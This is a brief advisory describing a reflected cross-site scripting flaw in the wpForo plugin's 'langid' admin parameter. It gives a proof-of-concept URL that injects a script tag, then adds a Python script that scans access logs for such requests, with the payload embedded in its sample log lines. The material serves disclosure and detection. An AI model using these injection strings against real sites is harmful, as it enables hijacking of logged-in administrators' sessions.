The plugin did not validate or escape the ‘langid’ GET parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged-in admin.
https://example.com/wp-admin/admin.php?page=wpforo-phrases&ids&action=-1&langid="><script>alert(/XSS/)</script>&phrase_package=0&paged=1&action2=-1
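
A log check for the request shown above, as an added example (not code from the plugin or from this advisory): it scans web access logs for requests to the wpforo-phrases admin page whose decoded langid value is not a plain integer. That langid is normally numeric is an assumption, and the function name, client addresses, `example-page` slug and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=wpforo-phrases&langid=1&paged=1 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=wpforo-phrases&ids&action=-1&langid=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&phrase_package=0 HTTP/1.1" 200 5301
203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/admin.php?page=example-page&langid=abc HTTP/1.1" 200 4000
203.0.113.5 - - [01/Jan/2024:10:03:00 +0000] "GET /wp-admin/admin.php?page=wpforo-phrases&langid= HTTP/1.1" 200 5100
"""

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate langid is a plain decimal ID.
NUMERIC_RE = re.compile(r"[0-9]+")


def suspicious_langid(log_text):
    """Return (client, decoded langid) for wpforo-phrases requests
    whose langid parameter is present, non-empty and not numeric."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes values; keep blanks so bare keys like "ids" parse.
        params = parse_qs(url.query, keep_blank_values=True)
        if "wpforo-phrases" not in params.get("page", []):
            continue
        for value in params.get("langid", []):
            if value and not NUMERIC_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_langid(SAMPLE_LOG):
        print(f"{client}: non-numeric langid {value!r}")
```
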